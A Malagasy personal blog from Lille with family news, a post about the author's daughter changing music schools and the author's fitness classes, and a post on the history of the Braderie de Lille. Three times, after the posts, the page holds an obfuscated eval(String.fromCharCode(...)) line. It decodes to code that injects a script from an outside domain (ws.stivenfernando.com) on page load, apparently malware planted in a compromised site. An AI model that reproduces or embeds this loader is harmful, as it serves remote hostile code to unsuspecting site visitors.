Ny 12/01/14 kosa no nitodi-doha ho any Antsirabe ho any @ ranomafana i neny sy i Raelina hitsabo tena kosa. Faly aho fa mba nahatsiaro tena ho azy i neny, mba ho azy samy irery, fa tsy ho an’izay rehetra izao akory, ny azy mantsy dia tsaroany daholo i babay sy i Lohavohitra rehetra izao, fa ny tenany dia ataony tsinontsinona matetika, fa ity kosa dia mba ho azy irery ihany ka dia mahafaly ahy izany, sady tena ilainy tokoa fa aiza ka vao 66 taona monja izy dia mitady hitondra tehina sahady………

Izahay aty ampita kosa izahay 3 mianaka aloha dia salama tsara, tahaka ny mahazatra dia nahazo izay niriany sy notadiaviny i Maeva, t@ andron’ny Noely.

I Hoby kosa dia ao Paris ao seriny ery @ asa aman-draharaha sahaniny ao. Ny havana rehetra dia samy salama avokoa.

Irariana mba ho taom-pahasambarana ho antsika ity taona 2014 ity.

Ho anao mamangy eto dia tsy adio ihany koa ny mirary soa ho anao sy ny ankohonanao.eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


No comments

Ny Fitaizana

Tsy hitako aiz any hanombohana izy ity fa dia sahirana nys aiko ato,

Efa nanoratra momba ny sakan-taona ihany aho teo aloha fa dia tena miha mafy izy ato e! tsy miantso vonjy akory hihihi satria dia izay moa ilay mitaiza e!

Asa koa moa fa ity faramparan’ny taona ity dia ohatran’ny mandalo “sedra” izany ny fiainako fa vitako io e! tsy misy mafy tsy laitran’ny zoto hoy ny fitenenana izay,

Raha eo @ lafin’ny fiainana an-davan’andro indray moa dia niova ny fomba fiainanay satria dia manjary tsy manao “mozika” intsony i Maeva fa vizana hono izy!!! izany hoe azavaiko kely sady vizana izy no koa tsy afaka mandray azy intsony ny sekoly nianarany taloha fa voatokana ho an’ny mpiara monina ao @ io faritra io ihany ny fianarana ao izany hoe raha mponina avy aty ivelan’ny faritra dia mahazo mianatra ao ihany fa ny saram-pianarana koa dia midangana be ka tsy takatry ny aiko ka dia naleo dia najanona izy, sady mmhh zarany rahateo koa aza moa fa nanomboka leo nilalao violon hono izy fa hirahira no tena tiany atao indray, dia rafitra teo indray ny fitadiavana sekoly maika ary soa fa nahita sekoly tsara sady mba azo atao hoe mirary ihany ny sandany izahay dia ny La Voix Lactée izany. vao nianatraandro voalohany aloha izy dia somary menatra ihany satria efa misy somary kalaza ihany ao @ ilay fianarany, dia tsy sahy nihira izy, (ahoana no nahafantarako hoe tsy sahy nihira izy?? hihihiih satria aho nihaino tao ambadiky ny varavarana fa tsy hainy aho hoe tao!!!)

Dia izaho indray moa dia tena vao² be amiko mihintsy fa lasa manao fanatanjahan-tena in droa isan-kerinandro aho izao, izany hoe miezaka aho mandeha in droa izany ao anatin’ny herinandro na fara faharatsiny dia indray isan-kerinandro manao zumba na manao step ihany koa, fa ny loza dia t@ nanao step voalohany aho dia nijafajafa ny anmpitso taorian’ny nanaovana azy io fa dia naharary tanteraka ny kibon-dranjoko, tsy nahatsiaro tena ho vizaka aho anefa fa dia ny kibon-dranjoko ihany no tena tsy tantiko, nalona tao anaty rano mangatsiaka sy mafanaa ary norina t@ diclofenac fa samy tsy nisy nandaitra ireo, fa dia mbola mijafajafa ihany roa andro izao.

Tapaka indray ny aingam-panahiko nanoratra fa nisy sofin-danitra somary elaela ihany teo fa dia tohizana @ manaraka indray

 

 

 

 

 eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


No comments

Braderie de Lille

Isaky ny voalohan’ny faran’ny ferinandron’ny volana Septambra moa dia misy ny atao hoe “Braderie de Lille” izay tsena be tokoa aty aminay, ary dia mahavory olona maro tokoa, misy tantarany izy io, izany hoe t@ andro fahiny, dia nomena alalana ny mpiasa an-trano mba hivarotra ny fitaovana tsy ampiasain’ny tompon-trano intsony ka mibahan-toerana fotsiny ao amin’ny ‘grenier’ izany, ka isaky ny 1er WE ,’ny volana Septembra no anaovana io, fa ankehitriny kosa, dia toa nivadika ho tsena be izany, na dia mbola eo ihany aza ilay finiavan’ny olona hitana ny maha ‘braderie’ azy, izany hoe hivarotana tokoa ny entana tsy ampiasaina intsony ao an-trano.

Ankehitriny dia ny Mairie de LIlle no misahana ny fandrindrana io sehatra io, ary dia fety tokoa mandritry ny 2 andro sy tapany aty aminay, ny marathon no manokatra ny fety @ izany avay eo vao mahazo mivarotra ny rehetra. Fa mialohan’izany anefa dia mila mamandrika toerana fa satria dia ifampitadiavana ny toerana hivarotana @io fotoana io, fa ankoatran’ny olona ety an-toerana dia maro ihany koa ireo avy any ivelany tonga mba hanao varo-mandeha kely @ ireo andro ireo.

(tapaka ny feeling nanoratra tsss tapaka adiny 3 beh izao tsy haiko intsony inona ny tiako nosoratana teo)

 

Fa ankehitriny kosa dia niova ny endriky ny ‘Braderie’ fa dia maro ny mpivarotra enta-madinika vita avy any Chine sy tsy hay fihaviana any, ary dia niha vitsy ihany koa ny olona tonga satria raha teo @ 5 million teo ho eo ny mpitsidika t@ taona 2001 tany ho any , taona nahatongavako taty dia hitako sy tsikaritra miha mihena izany, eo ny Antony ara-bola ngamba hoy aho, ary eo ihany koa ny antony hoe  tsy dia misy endriny tena izy intsony ilay braderie fa ohatran’ny tsena be sisa ilay izy, eo ihany koa moa ny nanasiana ny ‘zone rouge’ tsy azo hivarotana fa natokana hifaamoivoizana fotsiny……

 eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


30 comments